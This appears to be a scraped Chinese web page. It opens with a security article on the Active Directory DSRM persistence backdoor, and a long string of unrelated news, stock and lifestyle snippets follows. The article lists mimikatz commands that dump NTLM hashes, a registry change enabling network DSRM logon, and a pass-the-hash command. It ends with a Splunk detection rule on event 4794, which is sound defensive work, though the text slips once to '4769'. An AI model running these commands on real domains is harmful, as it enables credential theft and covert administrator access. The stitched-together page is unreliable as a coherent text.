01、简介
每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。
域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。
(资料图片仅供参考)
02、利用方式
(1)获取域内用户Hash
使用mimikatz查看域内用户test的NTLM Hash。
mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
(2)将DSRM帐户和域用户的NTLM Hash同步
使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。
(3)抓取DSRM密码
因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。
mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
(4)修改DSRM登录方式
DSRM 有三种登录方式,具体如下:
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
修改注册表:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(5)使用DSRM远程登录
在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。
mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
03、攻击检测
当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。
4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。
安全规则:
index=ad EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message
安全告警效果如下图:
01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator
2023年广东省考报名官网2023年广东公务员省考报名系统为:广东省公务员考试录用管理信息系统网址:https: ggfw hrss gd gov cn gw
1月9日(周一),A股有所走强,截至收盘,上证综指涨0 58%至3176 08点,日线已“六连阳”,显得比较强势。此外,深综指涨0 68%,创业板综指涨0 57
图为浙江省嘉兴市商务包机出海抢单团到达日本东京站。 (嘉兴市商务局供图) 2022年12月4日,浙江省正式启动“千团万企拓市场抢订单行动
我之前介绍过Notion这款产品,它很好用,是一个不错的生产力工具。但是,在实际工作场景中我已经换到了钉钉文档。过去半年我作为产品顾问参与
因为粽子放糖是甜的当然好吃了。大多数人都有吃甜食的习惯,越吃甜的越想吃,不知不觉每天就会吃很多甜东西,当然也不会放过好吃的放了糖的粽
23上海华瑞银行CD010发布发行公告
本文作者从自身工作实践出发,梳理总结了PRD撰写上需要注意的几个问题,与大家分享。01原以为恰到好处的描述,或许不是最佳表达方式怎么在PRD
文 吴明辉中国白酒行业的2022年可以用“大延续、小变化”六个字来概括。数据显示,2022年1-10月,中国规模以上
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
参考消息网1月7日报道日本《读卖新闻》1月6日刊登题为《剔除中国将加剧世界性通货膨胀》的文章,作者是三菱UFJ研究咨询公
央视新闻消息,1月5日,珠海市新型冠状病毒感染疫情防控指挥部办公室发布通告,将调整珠澳、珠港口岸通关措施。详情如下:一、珠澳方向1 2023
近日,汪小菲和张颖颖一起逛街买衣服。两人未去奢侈品店铺,而是来到了某快销服饰店选购衣服。
IntelArc(锐炫)作为英特尔全新高性能游戏显卡品牌,第一代产品就是Alchemist显卡(DG2)。按照之前英特尔公布的开发计划,Alchemist之后分别
挖贝网1月6日,千红制药(002550)近日发布公告,常州千红生化制药股份有限公司(以下简称“公司”或“本公司”)将与牧原食品股份有限公司...
四川已正式确定4个县(区)为县域民营经济改革试点地区,此轮试点为何确定这4个县(区)?改革又有哪些重点任务?
1、按件收费收取(1)无财产争议:6000元-20000元之间;(2)法律文书:600元-2000元之间;(3)律师见证:2000元-10000元之间;(4)代办公证
同花顺数据中心显示,二六三1月5日获融资买入1 69亿元,占当日买入金额的24 37%,当前融资余额4 90亿元,占流通市值的6 32%,低于历史40%分位
如果你看好一款MPV,上网询问大家选哪个配置的时候,很多人都会劝你买最低配,甚至还有人给你推荐一些改装案例。讲真,如果你这个时候认真了,
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
目前宫颈癌疫苗没有一价的,有二价、四价、九价三种,几价疫苗并不是针对疫苗价格而言的,而是体现在它能够预防哪几种人乳头瘤病毒(HPV)的感
直播吧11月20日讯据《世界体育报》报道,布斯克茨接受前队友阿圭罗网络连线采访,谈及自己的未来和世界杯的话题,布斯克茨表示:西班牙可以和
当地时间4日凌晨,俄罗斯军方表示,位于顿涅茨克地区马克耶夫卡居民点区域内的俄军临时部署点1日遭到乌方火箭弹打击,俄方军人死亡人数已上升
2022年实力交付1281万方解码金科背后的硬核交付体系2023年01月04日14:44中国网财经
证券时报e公司讯,滨江集团(002244)在互动平台回复投资者表示,自成立以来,公司一直从事房地产开发及其延伸业务的经营。2022年,公司销售金额
太平洋证券股份有限公司盛丽华,谭紫媚近期对澳华内镜进行研究并发布了研究报告《澳华内镜深度报告:国产内镜设备先锋,开启4K软镜新纪元》,本
工作的文艺句子精选60句1 不好好的逼自己一把,怎能知道自己内在的潜力是有多大?2 夜很深,深不过思念的痛。从不怀疑你最初的真心,也相信我
正帆科技:上海正帆科技股份有限公司关于以集中竞价交易方式回购公司股份的进展公告
中国网是国务院新闻办公室领导,中国外文出版发行事业局管理的国家重点新闻网站。本网通过10个语种11个文版,24小时对外发布信息,是中国进行
淘气天尊:节后市场如期上涨突破3100点!周二上午市场呈现低开高走的格局,投资者可以看到,早盘沪指低开1点于3087点,创业板低开6点于2339点
Copyright © 2015-2022 今日服装网版权所有 备案号:沪ICP备2022005074号-40 联系邮箱:5 85 59 73 @qq.com